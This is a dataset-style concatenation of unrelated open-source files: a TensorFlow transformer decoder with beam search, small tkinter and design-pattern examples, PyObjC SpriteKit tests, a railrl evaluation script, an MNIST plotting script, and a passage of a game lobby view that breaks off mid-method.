            return i+1, preds, cache_decoder, logits, len_decoded, finished

        def not_finished(i, preds, cache, logit, len_decoded, finished):
            # Continue while any hypothesis is unfinished and the step count
            # stays under both the encoder length and the configured cap.
            return tf.logical_and(
                tf.reduce_any(tf.logical_not(finished)),
                tf.less(
                    i,
                    tf.reduce_min([tf.shape(encoded)[1], self.args.max_len])  # maxlen = 25
                )
            )

        i, preds, cache_decoder, logits, len_decoded, finished = tf.while_loop(
            cond=not_finished,
            body=step,
            loop_vars=[0, token_init, cache_decoder_init, logits_init, len_decoded_init, finished_init],
            shape_invariants=[tf.TensorShape([]),
                              tf.TensorShape([None, None]),
                              tf.TensorShape([None, None, None, None]),
                              tf.TensorShape([None, None, self.dim_output]),
                              tf.TensorShape([None]),
                              tf.TensorShape([None])]
        )

        # len_decoded = tf.Print(len_decoded, [finished], message='finished: ', summarize=1000)
        len_decoded -= 1-tf.to_int32(finished)  # for decoded length cut by encoded length
        # Drop the initial dummy slot / <sos> column before returning.
        logits = logits[:, 1:, :]
        preds = preds[:, 1:]
        not_padding = tf.sequence_mask(len_decoded, dtype=tf.int32)
        preds = tf.multiply(tf.to_int32(preds), not_padding)

        return logits, preds, len_decoded

    def decoder_with_caching_impl(self, decoder_input, decoder_cache, encoder_output, encoder_attention_bias):
        """Incremental decoder: computes only the newest position and appends
        each block's output to the running cache."""
        # Positional Encoding
        decoder_input += common_attention.add_timing_signal_1d(decoder_input)
        # Dropout
        decoder_output = tf.layers.dropout(decoder_input,
                                           rate=self.residual_dropout_rate,
                                           training=self.is_train)
        new_cache = []

        # rest block with residual
        for i in range(self.num_blocks):
            with tf.variable_scope("block_{}".format(i)):
                # Multihead Attention (self-attention)
                # the caching_impl only need to calculate decoder_output[:, -1:, :] !
                decoder_output = residual(decoder_output[:, -1:, :],
                                          multihead_attention(
                                              query_antecedent=decoder_output,
                                              memory_antecedent=None,
                                              bias=None,
                                              total_key_depth=self.num_cell_units,
                                              total_value_depth=self.num_cell_units,
                                              num_heads=self.num_heads,
                                              dropout_rate=self.attention_dropout_rate,
                                              num_queries=1,
                                              output_depth=self.num_cell_units,
                                              name="decoder_self_attention",
                                              summaries=False),
                                          dropout_rate=self.residual_dropout_rate)

                # Multihead Attention (vanilla attention)
                decoder_output = residual(decoder_output,
                                          multihead_attention(
                                              query_antecedent=decoder_output,
                                              memory_antecedent=encoder_output,
                                              bias=encoder_attention_bias,
                                              total_key_depth=self.num_cell_units,
                                              total_value_depth=self.num_cell_units,
                                              output_depth=self.num_cell_units,
                                              num_heads=self.num_heads,
                                              dropout_rate=self.attention_dropout_rate,
                                              num_queries=1,
                                              name="decoder_vanilla_attention",
                                              summaries=False),
                                          dropout_rate=self.residual_dropout_rate)

                # Feed Forward
                decoder_output = residual(decoder_output,
                                          ff_hidden(
                                              decoder_output,
                                              hidden_size=4 * self.num_cell_units,
                                              output_size=self.num_cell_units,
                                              activation=self._ff_activation),
                                          dropout_rate=self.residual_dropout_rate)

                # Re-attach this block's history so the next step sees it.
                decoder_output = tf.concat([decoder_cache[:, :, i, :], decoder_output], axis=1)
                new_cache.append(decoder_output[:, :, None, :])

        new_cache = tf.concat(new_cache, axis=2)  # [batch_size, n_step, num_blocks, num_hidden]

        return decoder_output, new_cache

    def decoder_impl(self, decoder_input, encoder_output, len_encoded):
        """Full (non-incremental) decoder stack used for training."""
        # encoder_padding = tf.equal(tf.reduce_sum(tf.abs(encoder_output), axis=-1), 0.0)
        encoder_padding = tf.equal(tf.sequence_mask(len_encoded, maxlen=tf.shape(encoder_output)[1]), False)  # bool tensor
        # [-0 -0 -0 -0 -0 -0 -0 -0 -0 -1e+09] the padding place is -1e+09
        encoder_attention_bias = common_attention.attention_bias_ignore_padding(encoder_padding)

        decoder_output = self.embedding(decoder_input)
        # Positional Encoding
        decoder_output += common_attention.add_timing_signal_1d(decoder_output)
        # Dropout
        decoder_output = tf.layers.dropout(decoder_output,
                                           rate=self.residual_dropout_rate,
                                           training=self.is_train)
        # Bias for preventing peeping later information
        self_attention_bias = common_attention.attention_bias_lower_triangle(tf.shape(decoder_input)[1])

        # Blocks
        for i in range(self.num_blocks):
            with tf.variable_scope("block_{}".format(i)):
                # Multihead Attention (self-attention)
                decoder_output = residual(decoder_output,
                                          multihead_attention(
                                              query_antecedent=decoder_output,
                                              memory_antecedent=None,
                                              bias=self_attention_bias,
                                              total_key_depth=self.num_cell_units,
                                              total_value_depth=self.num_cell_units,
                                              num_heads=self.num_heads,
                                              dropout_rate=self.attention_dropout_rate,
                                              output_depth=self.num_cell_units,
                                              name="decoder_self_attention",
                                              summaries=False),
                                          dropout_rate=self.residual_dropout_rate)

                # Multihead Attention (vanilla attention)
                decoder_output = residual(decoder_output,
                                          multihead_attention(
                                              query_antecedent=decoder_output,
                                              memory_antecedent=encoder_output,
                                              bias=encoder_attention_bias,
                                              # bias=None,
                                              total_key_depth=self.num_cell_units,
                                              total_value_depth=self.num_cell_units,
                                              output_depth=self.num_cell_units,
                                              num_heads=self.num_heads,
                                              dropout_rate=self.attention_dropout_rate,
                                              name="decoder_vanilla_attention",
                                              summaries=False),
                                          dropout_rate=self.residual_dropout_rate)

                # Feed Forward
                decoder_output = residual(decoder_output,
                                          ff_hidden(
                                              decoder_output,
                                              hidden_size=4 * self.num_cell_units,
                                              output_size=self.num_cell_units,
                                              activation=self._ff_activation),
                                          dropout_rate=self.residual_dropout_rate)

        return decoder_output

    def beam_decode_rerank(self, encoded, len_encoded):
        """
        Beam search, reranked at the end with language-model integration
        (self-attention LM). The input to the LM score is <sos> + tokens.
        """
        beam_size = self.beam_size
        batch_size = tf.shape(len_encoded)[0]

        # beam search Initialize
        # repeat each sample in batch along the batch axis [1,2,3,4] -> [1,1,2,2,3,3,4,4]
        encoded = tf.tile(encoded[:, None, :, :],
                          multiples=[1, beam_size, 1, 1])  # [batch_size, beam_size, *, hidden_units]
        encoded = tf.reshape(encoded,
                             [batch_size * beam_size, -1, encoded.get_shape()[-1].value])
        len_encoded = tf.reshape(tf.tile(len_encoded[:, None], multiples=[1, beam_size]), [-1])  # [batch_size * beam_size]

        # [[<S>, <S>, ..., <S>]], shape: [batch_size * beam_size, 1]
        token_init = tf.fill([batch_size * beam_size, 1], self.args.sos_idx)
        logits_init = tf.zeros([batch_size * beam_size, 0, self.dim_output], dtype=tf.float32)
        len_decoded_init = tf.ones_like(len_encoded, dtype=tf.int32)
        # the score must be [0, -inf, -inf, ...] at init, for the preds in beam is same in init!!!
        scores_init = tf.constant([0.0] + [-inf] * (beam_size - 1), dtype=tf.float32)  # [beam_size]
        scores_init = tf.tile(scores_init, multiples=[batch_size])  # [batch_size * beam_size]
        finished_init = tf.zeros_like(scores_init, dtype=tf.bool)

        cache_decoder_init = tf.zeros([batch_size*beam_size,
                                       0,
                                       self.num_blocks,
                                       self.num_cell_units])
        if self.lm:
            cache_lm_init = tf.zeros([batch_size*beam_size,
                                      0,
                                      self.lm.args.model.decoder.num_blocks,
                                      self.lm.args.model.decoder.num_cell_units])
        else:
            cache_lm_init = tf.zeros([0, 0, 0, 0])

        # collect the initial states of lstms used in decoder.
        base_indices = tf.reshape(tf.tile(tf.range(batch_size)[:, None], multiples=[1, beam_size]), shape=[-1])

        encoder_padding = tf.equal(tf.sequence_mask(len_encoded, maxlen=tf.shape(encoded)[1]), False)  # bool tensor
        encoder_attention_bias = common_attention.attention_bias_ignore_padding(encoder_padding)

        def step(i, preds, scores, cache_decoder, cache_lm, logits, len_decoded, finished):
            """
            One beam-expansion step. The caches have no fixed shape, so they
            cannot be packed into a single state structure.
            """
            preds_emb = self.embedding(preds)
            decoder_input = preds_emb

            decoder_output, cache_decoder = self.decoder_with_caching_impl(
                decoder_input,
                cache_decoder,
                encoded,
                encoder_attention_bias)

            cur_logit = tf.layers.dense(
                inputs=decoder_output[:, -1, :],
                units=self.dim_output,
                activation=None,
                use_bias=False,
                name='decoder_fc')

            logits = tf.concat([logits, cur_logit[:, None]], 1)
            z = tf.nn.log_softmax(cur_logit)  # [batch*beam, size_output]

            # the language model inference (shallow fusion)
            if self.args.model.shallow_fusion:
                assert self.lm
                preds_emb = self.lm.decoder.embedding(preds)

                with tf.variable_scope(self.args.top_scope, reuse=True):
                    with tf.variable_scope(self.args.lm_scope):
                        lm_output, cache_lm = self.lm.decoder.decoder_with_caching_impl(preds_emb, cache_lm)
                        logit_lm = dense(
                            inputs=lm_output[:, -1, :],
                            units=self.dim_output,
                            kernel=tf.transpose(self.lm.decoder.fully_connected),
                            use_bias=False)
                z_lm = self.lambda_lm * tf.nn.log_softmax(logit_lm)  # [batch*beam, size_output]
            else:
                z_lm = tf.zeros_like(z)

            # rank the combined scores
            next_scores, next_preds = tf.nn.top_k(z+z_lm, k=beam_size, sorted=True)
            next_preds = tf.to_int32(next_preds)

            # beamed scores & Pruning
            scores = scores[:, None] + next_scores  # [batch_size * beam_size, beam_size]
            scores = tf.reshape(scores, shape=[batch_size, beam_size * beam_size])

            _, k_indices = tf.nn.top_k(scores, k=beam_size)
            k_indices = base_indices * beam_size * beam_size + tf.reshape(k_indices, shape=[-1])  # [batch_size * beam_size]
            # Update scores.
            scores = tf.reshape(scores, [-1])
            scores = tf.gather(scores, k_indices)
            # Update predictions.
            next_preds = tf.reshape(next_preds, shape=[-1])
            next_preds = tf.gather(next_preds, indices=k_indices)

            # k_indices: [0~batch*beam*beam], preds: [0~batch*beam]
            # preds, cache_lm, cache_decoder: these data are shared during the beam expand among vocab
            preds = tf.gather(preds, indices=k_indices // beam_size)
            cache_lm = tf.gather(cache_lm, indices=k_indices // beam_size)
            cache_decoder = tf.gather(cache_decoder, indices=k_indices // beam_size)

            preds = tf.concat([preds, next_preds[:, None]], axis=1)  # [batch_size * beam_size, i]

            has_eos = tf.equal(next_preds, self.end_token)
            finished = tf.logical_or(finished, has_eos)
            len_decoded += 1-tf.to_int32(finished)

            # i = tf.Print(i, [i], message='i: ', summarize=1000)

            return i+1, preds, scores, cache_decoder, cache_lm, logits, len_decoded, finished

        def not_finished(i, preds, scores, cache_decoder, cache_lm, logit, len_decoded, finished):
            # i = tf.Print(i, [i], message='i: ', summarize=1000)
            return tf.logical_and(
                tf.reduce_any(tf.logical_not(finished)),
                tf.less(
                    i,
                    tf.reduce_min([tf.shape(encoded)[1], self.args.max_len])  # maxlen = 100
                )
            )

        _, preds, scores_am, _, _, logits, len_decoded, finished = tf.while_loop(
            cond=not_finished,
            body=step,
            loop_vars=[0, token_init, scores_init, cache_decoder_init, cache_lm_init, logits_init, len_decoded_init, finished_init],
            shape_invariants=[tf.TensorShape([]),
                              tf.TensorShape([None, None]),
                              tf.TensorShape([None]),
                              tf.TensorShape([None, None, None, None]),
                              tf.TensorShape([None, None, None, None]),
                              tf.TensorShape([None, None, self.dim_output]),
                              tf.TensorShape([None]),
                              tf.TensorShape([None])]
        )

        # [batch_size * beam_size, ...]
        len_decoded -= 1-tf.to_int32(finished)  # for decoded length cut by encoded length
        preds = preds[:, 1:]
        not_padding = tf.sequence_mask(len_decoded, dtype=tf.int32)
        preds *= not_padding

        # [batch_size , beam_size, ...]
        if self.args.model.rerank:
            assert self.lm
            with tf.variable_scope(self.args.top_scope, reuse=True):
                with tf.variable_scope(self.args.lm_scope):
                    scores_lm, distribution = self.lm.decoder.score(preds, len_decoded)

            scores_lm = self.args.lambda_rerank * scores_lm
        else:
            scores_lm = tf.zeros_like(scores_am)

        scores = scores_am + scores_lm

        # tf.nn.top_k is used to sort `scores`
        scores_sorted, sorted = tf.nn.top_k(tf.reshape(scores, [batch_size, beam_size]),
                                            k=beam_size,
                                            sorted=True)

        sorted = base_indices * beam_size + tf.reshape(sorted, shape=[-1])  # [batch_size * beam_size]

        # [batch_size * beam_size, ...]
        logits_sorted = tf.gather(logits, sorted)
        preds_sorted = tf.gather(preds, sorted)
        len_decoded_sorted = tf.gather(len_decoded, sorted)
        scores_lm_sorted = tf.gather(scores_lm, sorted)
        scores_am_sorted = tf.gather(scores_am, sorted)

        # [batch_size, beam_size, ...]
        scores_lm_sorted = tf.reshape(scores_lm_sorted, shape=[batch_size, beam_size])
        scores_am_sorted = tf.reshape(scores_am_sorted, shape=[batch_size, beam_size])
        preds_sorted = tf.reshape(preds_sorted, shape=[batch_size, beam_size, -1])  # [batch_size, beam_size, max_length]
        logits_sorted = tf.reshape(logits_sorted, [batch_size, beam_size, -1, self.dim_output])
        len_decoded_sorted = tf.reshape(len_decoded_sorted, [batch_size, beam_size])

        # return logits, final_preds, len_encoded
        return [logits_sorted, preds_sorted, len_decoded_sorted, scores_am_sorted, scores_lm_sorted], preds_sorted[:, 0, :], len_decoded_sorted[:, 0]

    def forward(self, i, preds, state_decoder):
        """
        Single RNN decoder step over frame ``i``.
        Uses:
            self.cell
            self.encoded
        NOTE(review): this method reads self.cell / self.encoded /
        self.num_cell_units_en, which are not set in this class's __init__ —
        it appears carried over from an RNN decoder; confirm before relying on it.
        """
        prev_emb = self.embedding(preds[:, -1])
        decoder_input = tf.concat([self.encoded[:, i, :], prev_emb], axis=1)
        decoder_input.set_shape([None, self.num_cell_units_en+self.size_embedding])

        with tf.variable_scope(self.name or 'decoder', reuse=True):
            with tf.variable_scope("decoder_lstms"):
                output_decoder, state_decoder = tf.contrib.legacy_seq2seq.rnn_decoder(
                    decoder_inputs=[decoder_input],
                    initial_state=state_decoder,
                    cell=self.cell)

            cur_logit = tf.layers.dense(
                inputs=output_decoder[0],
                units=self.dim_output,
                activation=None,
                use_bias=False,
                name='fully_connected'
            )
        cur_ids = tf.to_int32(tf.argmax(cur_logit, -1))

        return cur_ids, state_decoder
| [
"[email protected]"
] | |
15ebe1a3991b7c2926af485aac68c164facd7718 | adbf09a31415e6cf692ff349bd908ea25ded42a8 | /widgets/hello.py | 1f431dbfab5106918d3f455f654bdbbf17576618 | [] | no_license | cmulliss/gui_python | 53a569f301cc82b58880c3c0b2b415fad1ecc3f8 | 6c83d8c2e834464b99024ffd8cf46ac4e734e7a4 | refs/heads/main | 2023-08-12T22:33:01.596005 | 2021-10-11T12:35:41 | 2021-10-11T12:35:41 | 408,176,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 359 | py | import tkinter as tk
from tkinter import ttk
# Tk() creates the application's main window; by convention it is named `root`.
# ttk.Label is a themed widget placed inside that window.
# .pack() is the geometry manager call that actually makes the label visible.
root = tk.Tk()
root.title("hello World")
ttk.Label(root, text="Hello World", padding=(30, 10)).pack()
# Enter the Tk event loop; this call blocks until the window is closed.
root.mainloop()
| [
"[email protected]"
] | |
79060db8148d189e49d71a2fcde2a58110cad683 | d4f05d51568bfda9fb964deba92d9fd599a3dcde | /desing_pattern/factory_method/idcard.py | d696179da0e2206fdb2814b3f87a9e6356415882 | [] | no_license | Fullmoon8507/PythonPracticeProject | 44beba7ce783e5e22429516d39ee96adc1ead785 | 57454099ad67bfe4431ee997fada640fde6ccecc | refs/heads/master | 2020-04-16T23:29:58.907552 | 2017-05-06T07:27:35 | 2017-05-06T07:27:35 | 53,178,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | from product import Product
class IDCard(Product):
    """Concrete Product of the factory-method pattern: an ID card that
    belongs to exactly one owner."""

    def __init__(self, owner):
        # Announce creation, then remember who the card was issued to.
        print(owner + 'のカードを作成します')
        self.__owner = owner

    def use(self):
        """Print a notice that the owner's card is being used."""
        print(self.get_owner() + 'のカードを使います')

    def get_owner(self):
        """Return the name of the card's owner."""
        return self.__owner
| [
"[email protected]"
] | |
8a4d5bed883776ebcd3fcc904288d9add338fef0 | 584f7b51d7cd529448e2fc0147557e26931ab17e | /test_Begin_dtype.py | 94c25b201a1b4bb74e965f1d89a9301ac63f4647 | [
"BSD-3-Clause"
] | permissive | opticspy/lightpipes | 8ca0d2221a1b893de5e51fec9061e90b9145f5f8 | f4ffdedb3ab2f9b5ae5a9a8e37985d2a7f8bb2ef | refs/heads/master | 2023-09-04T19:07:11.376631 | 2023-09-04T15:24:55 | 2023-09-04T15:24:55 | 80,127,706 | 191 | 55 | BSD-3-Clause | 2023-08-23T00:45:33 | 2017-01-26T15:39:28 | Python | UTF-8 | Python | false | false | 572 | py | #! /usr/bin/env python
"""
Script to test the Begin command with dtype option.
"""
from LightPipes import *
import numpy as np
import sys
wavelength = 500*nm
size = 25*mm
N = 3000
N2=int(N/2)
w0=2*mm
print("LightPipes version = ", LPversion)
print("without dtype option:")
F=Begin(size,wavelength,N)
print("type of F:",F._dtype)
print("size of F.field: ",sys.getsizeof(F.field)/1e9," Gbyte")
print("\n")
print("with dtype option:")
F=Begin(size,wavelength,N,dtype=np.complex64)
print("type of F:",F._dtype)
print("size of F.field: ",sys.getsizeof(F.field)/1e9," Gbyte")
| [
"[email protected]"
] | |
dd7bda05324df1c30a70004bdcf169a29b9a972f | b76615ff745c6d66803506251c3d4109faf50802 | /pyobjc-framework-SpriteKit/PyObjCTest/test_skview.py | 96b626096078794678e9693ea10f2b0c41775b58 | [
"MIT"
] | permissive | danchr/pyobjc-git | 6ef17e472f54251e283a0801ce29e9eff9c20ac0 | 62b787fddeb381184043c7ff136f1c480755ab69 | refs/heads/master | 2021-01-04T12:24:31.581750 | 2020-02-02T20:43:02 | 2020-02-02T20:43:02 | 240,537,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,319 | py | import sys
from PyObjCTools.TestSupport import *
import objc
if sys.maxsize > 2 ** 32:
    # Everything is guarded by this pointer-size check — presumably the
    # SpriteKit bindings are only available in 64-bit processes.
    import SpriteKit

    class TestSKViewHelper(SpriteKit.NSObject):
        # Helper object whose method signature is inspected by the
        # SKViewDelegate protocol test below.
        def view_shouldRenderAtTime_(self, v, t):
            return 1

    class TestSKView(TestCase):
        @min_os_level("10.9")
        def testMethods10_9(self):
            # Verify that the BOOL-valued SKView accessors added in 10.9 are
            # bridged with the correct argument/result types.
            self.assertArgIsBOOL(SpriteKit.SKView.setPaused_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.isPaused)

            self.assertArgIsBOOL(SpriteKit.SKView.setShowsFPS_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.showsFPS)

            self.assertArgIsBOOL(SpriteKit.SKView.setShowsDrawCount_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.showsDrawCount)

            self.assertArgIsBOOL(SpriteKit.SKView.setShowsNodeCount_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.showsNodeCount)

            self.assertArgIsBOOL(SpriteKit.SKView.setAsynchronous_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.isAsynchronous)

            self.assertArgIsBOOL(SpriteKit.SKView.setIgnoresSiblingOrder_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.ignoresSiblingOrder)

        @min_os_level("10.10")
        def testMethods10_10(self):
            # Same bridging checks for the accessors added in 10.10.
            self.assertArgIsBOOL(SpriteKit.SKView.setShowsFields_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.showsFields)

            self.assertArgIsBOOL(SpriteKit.SKView.setShowsPhysics_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.showsPhysics)

            self.assertArgIsBOOL(SpriteKit.SKView.setShowsQuadCount_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.showsQuadCount)

            self.assertArgIsBOOL(SpriteKit.SKView.setAllowsTransparency_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.allowsTransparency)

            self.assertArgIsBOOL(SpriteKit.SKView.setShouldCullNonVisibleNodes_, 0)
            self.assertResultIsBOOL(SpriteKit.SKView.shouldCullNonVisibleNodes)

        @min_sdk_level("10.12")
        def testProtocols(self):
            # SKViewDelegate: the delegate callback takes (view, time) and
            # returns BOOL; `time` is a C double.
            objc.protocolNamed("SKViewDelegate")

            self.assertResultIsBOOL(TestSKViewHelper.view_shouldRenderAtTime_)
            self.assertArgHasType(
                TestSKViewHelper.view_shouldRenderAtTime_, 1, objc._C_DBL
            )


if __name__ == "__main__":
    main()
| [
"[email protected]"
] | |
87df33662bfa4926caa32f3b3fb0907ed1ddbc37 | 32226e72c8cbaa734b2bdee081c2a2d4d0322702 | /experiments/state_distance/optimal_control_with_q.py | e6785e1a4453bcf63958d1b547ffd1074ec35676 | [
"MIT"
] | permissive | Asap7772/rail-rl-franka-eval | 2b1cbad7adae958b3b53930a837df8a31ab885dc | 4bf99072376828193d05b53cf83c7e8f4efbd3ba | refs/heads/master | 2022-11-15T07:08:33.416025 | 2020-07-12T22:05:32 | 2020-07-12T22:05:32 | 279,155,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,763 | py | """
Choose action according to
a = argmax_{a, s'} r(s, a, s') s.t. Q(s, a, s') = 0
where r is defined specifically for the reacher env.
"""
import argparse
import joblib
import numpy as np
from railrl.state_distance.policies import (
SoftOcOneStepRewardPolicy,
TerminalRewardSampleOCPolicy,
ArgmaxQFPolicy,
PseudoModelBasedPolicy,
SamplePolicyPartialOptimizer)
from railrl.samplers.util import rollout
from railrl.torch.pytorch_util import set_gpu_mode
from railrl.core import logger
def experiment(variant):
    # Placeholder: this script does all of its work under __main__ below.
    pass


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('file', type=str,
                        help='path to the snapshot file')
    parser.add_argument('--H', type=int, default=500,
                        help='Max length of rollout')
    parser.add_argument('--num_rollouts', type=int, default=1,
                        help='Number of rollouts per eval')
    parser.add_argument('--gpu', action='store_true')
    parser.add_argument('--argmax', action='store_true')
    parser.add_argument('--hide', action='store_true')
    parser.add_argument('--verbose', action='store_true')
    parser.add_argument('--planh', type=int, default=1,
                        help='Planning horizon')
    parser.add_argument('--discount', type=float, help='Discount Factor')
    parser.add_argument('--weight', type=float, default=1.,
                        help='Constraint penalty weight')
    parser.add_argument('--nsamples', type=int, default=100,
                        help='Number of samples for optimization')
    parser.add_argument('--ngrad', type=int, default=0,
                        help='Number of gradient steps for respective policy.')
    parser.add_argument('--mb', action='store_true',
                        help='Use (pseudo-)model-based policy')
    parser.add_argument('--partial', action='store_true',
                        help='Use partial state optimizer')
    parser.add_argument('--grid', action='store_true',
                        help='Sample actions from a grid')
    parser.add_argument('--dt', help='decrement tau', action='store_true')
    parser.add_argument('--cycle', help='cycle tau', action='store_true')
    args = parser.parse_args()

    # Load the pickled training snapshot (env + Q-function).
    data = joblib.load(args.file)
    print("Done loading")
    env = data['env']
    qf = data['qf']
    if args.gpu:
        set_gpu_mode(True)
        # NOTE(review): `ptu` is not imported in this file — the --gpu path
        # would raise NameError here; confirm against the original repo.
        qf.to(ptu.device)
    qf.train(False)
    print("Env type:", type(env))

    # Select the optimal-control policy variant from the CLI flags.
    if args.argmax:
        policy = ArgmaxQFPolicy(
            qf,
            env,
            sample_size=args.nsamples,
            num_gradient_steps=args.ngrad,
            sample_actions_from_grid=args.grid,
        )
    elif args.mb:
        policy = PseudoModelBasedPolicy(
            qf,
            env,
            sample_size=args.nsamples,
        )
    elif args.partial:
        policy = SamplePolicyPartialOptimizer(
            qf,
            env,
            data['policy'],
            sample_size=args.nsamples,
        )
    elif args.planh == 1:
        policy = SoftOcOneStepRewardPolicy(
            qf,
            env,
            data['policy'],
            constraint_weight=args.weight,
            sample_size=args.nsamples,
            verbose=args.verbose,
            sample_actions_from_grid=args.grid,
        )
    else:
        policy = TerminalRewardSampleOCPolicy(
            qf,
            env,
            horizon=args.planh,
            constraint_weight=args.weight,
            sample_size=args.nsamples,
            verbose=args.verbose,
        )

    discount = 0
    if args.discount is not None:
        print("WARNING: you are overriding the discount factor. Right now "
              "only discount = 0 really makes sense.")
        discount = args.discount
    init_tau = discount
    # Evaluation loop: sample a goal, roll out the policy, and decrement
    # (or cycle) tau as the rollouts proceed; runs until interrupted.
    while True:
        paths = []
        tau = init_tau
        policy.set_tau(tau)
        for _ in range(args.num_rollouts):
            goal = env.sample_goal_for_rollout()
            if args.verbose:
                env.print_goal_state_info(goal)
            env.set_goal(goal)
            policy.set_goal(goal)
            path = rollout(
                env,
                policy,
                max_path_length=args.H,
                animated=not args.hide,
            )
            # Attach the goal to every timestep for diagnostics.
            path['goal_states'] = np.repeat(
                np.expand_dims(goal, 0),
                len(path['observations']),
                0,
            )
            paths.append(path)
            tau -= 1
            if tau < 0:
                if args.cycle:
                    tau = init_tau
                else:
                    tau = 0
            policy.set_tau(tau)
        env.log_diagnostics(paths)
        logger.dump_tabular()
| [
"[email protected]"
] | |
7539f89d65e13d8d08aa52f5ad2cb95edad6e77c | 572dd7f851ff2f6b39fea8f99199c22260f113df | /user/messages/success.py | b4e779b05fd4003a8e96f5153edf170b46c1ee00 | [] | no_license | SEUNAGBEYE/Flighty | f869f3fb1c1c74bddff9102b11a02411f502dc52 | 46247f93e7f9c83441c3f50eaca2f0d3eaeca96f | refs/heads/develop | 2022-12-13T12:17:58.760670 | 2019-07-29T15:51:36 | 2019-07-29T15:51:36 | 165,585,170 | 0 | 0 | null | 2022-12-08T01:36:58 | 2019-01-14T02:52:46 | Python | UTF-8 | Python | false | false | 172 | py | USER_CREATED = 'User successfully created'
LOGIN_SUCCESSFULL = 'User sucessfully logged in'
PROFILE_UPDATED = 'Profile updated'
USER_RETRIEVED = 'User successfully fetched' | [
"[email protected]"
] | |
82332f085a0ce0530c27abb8493eb16799f8861a | 44e8334e1b17fda7f60d9760f59868a9227e2ab0 | /python-tf/tf2/tf2-10-0-mnist.py | 1510bd8a4542793f25cbb4c7648fb41506d3382a | [] | no_license | MysteriousSonOfGod/python-3 | 47c2aa69a84ba78876c74bc6f2e7e6f3093df1e2 | a303a5284c40f3cb96a8082a1f5ed80773b66336 | refs/heads/master | 2023-02-16T18:21:46.153388 | 2021-01-13T10:55:14 | 2021-01-13T10:55:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,295 | py | # Lab 7 Learning rate and Evaluation
import tensorflow as tf
import matplotlib as mpl
import matplotlib.pyplot as plt
import sys, os
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
import images.image
learning_rate = 0.001
training_epochs = 15  # one full pass over the training data = 1 epoch
batch_size = 100  # number of samples processed per update step instead of all data
# e.g. with 1000 samples and batch_size 100, one epoch takes 10 iterations
nb_classes = 10

mnist = tf.keras.datasets.mnist

(x_train, y_train), (x_test, y_test_org) = mnist.load_data()

# The first training image shows raw pixel values in the range 0-255.
plt.figure()
plt.imshow(x_train[0])
plt.colorbar()
plt.grid(False)
images.image.save_fig("tf2.10.0.mnist_train_images")
plt.show()

# normalizing data
# NOTE(review): the normalized test set is bound to x_test_normal but is
# never used below in this chunk — confirm intent.
x_train, x_test_normal = x_train / 255.0, x_test / 255.0

# Plot the first 25 training images with their class labels underneath.
plt.figure(figsize=(10,10))
for i in range(25):
    plt.subplot(5,5,i+1)
    plt.xticks([])
    plt.yticks([])
    plt.grid(False)
    plt.imshow(x_train[i], cmap=plt.cm.binary)
    plt.xlabel(y_train[i])
images.image.save_fig("tf2.10.0.mnist_train_images1_25")
plt.show()
| [
"[email protected]"
] | |
d7d9397514f924e2e3c51219055782d39055529b | f82e67dd5f496d9e6d42b4fad4fb92b6bfb7bf3e | /scripts/client/gui/scaleform/daapi/view/lobby/lobbyview.py | ccca6333bda22faa53d118768576e781414e63cf | [] | no_license | webiumsk/WOT0.10.0 | 4e4413ed4e7b00e22fb85d25fdae9400cbb4e76b | a84f536c73f86d9e8fab559e97f88f99f2ad7e95 | refs/heads/master | 2021-01-09T21:55:00.662437 | 2015-10-23T20:46:45 | 2015-10-23T20:46:45 | 44,835,654 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,690 | py | # Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/LobbyView.py
import BigWorld
import VOIP
import constants
import CommandMapping
from PlayerEvents import g_playerEvents
from gui import game_control, SystemMessages
import gui
from gui.LobbyContext import g_lobbyContext
from gui.battle_control import g_sessionProvider
from gui.Scaleform.daapi.view.meta.LobbyPageMeta import LobbyPageMeta
from gui.Scaleform.framework.entities.View import View
from gui.Scaleform.genConsts.FORTIFICATION_ALIASES import FORTIFICATION_ALIASES
from gui.Scaleform.genConsts.PREBATTLE_ALIASES import PREBATTLE_ALIASES
from gui.Scaleform.locale.SYSTEM_MESSAGES import SYSTEM_MESSAGES
from gui.prb_control.dispatcher import g_prbLoader
from gui.shared.ItemsCache import g_itemsCache
from gui.shared.utils.HangarSpace import g_hangarSpace
from gui.shared import EVENT_BUS_SCOPE, events, event_dispatcher as shared_events
from gui.Scaleform.framework import ViewTypes
from gui.Scaleform.Waiting import Waiting
from gui.Scaleform.daapi.settings.views import VIEW_ALIAS
from gui.shared.utils.functions import getViewName
from helpers import i18n
class LobbyView(LobbyPageMeta):
VIEW_WAITING = (VIEW_ALIAS.LOBBY_HANGAR,
VIEW_ALIAS.LOBBY_INVENTORY,
VIEW_ALIAS.LOBBY_SHOP,
VIEW_ALIAS.LOBBY_PROFILE,
VIEW_ALIAS.LOBBY_BARRACKS,
PREBATTLE_ALIASES.TRAINING_LIST_VIEW_PY,
PREBATTLE_ALIASES.TRAINING_ROOM_VIEW_PY,
VIEW_ALIAS.LOBBY_CUSTOMIZATION,
VIEW_ALIAS.LOBBY_RESEARCH,
VIEW_ALIAS.LOBBY_TECHTREE,
FORTIFICATION_ALIASES.FORTIFICATIONS_VIEW_ALIAS,
VIEW_ALIAS.BATTLE_QUEUE,
VIEW_ALIAS.BATTLE_LOADING)
class COMPONENTS:
HEADER = 'lobbyHeader'
def __init__(self, ctx = None):
super(LobbyView, self).__init__(ctx)
self.__currIgrType = constants.IGR_TYPE.NONE
def getSubContainerType(self):
return ViewTypes.LOBBY_SUB
def _populate(self):
View._populate(self)
self.__currIgrType = gui.game_control.g_instance.igr.getRoomType()
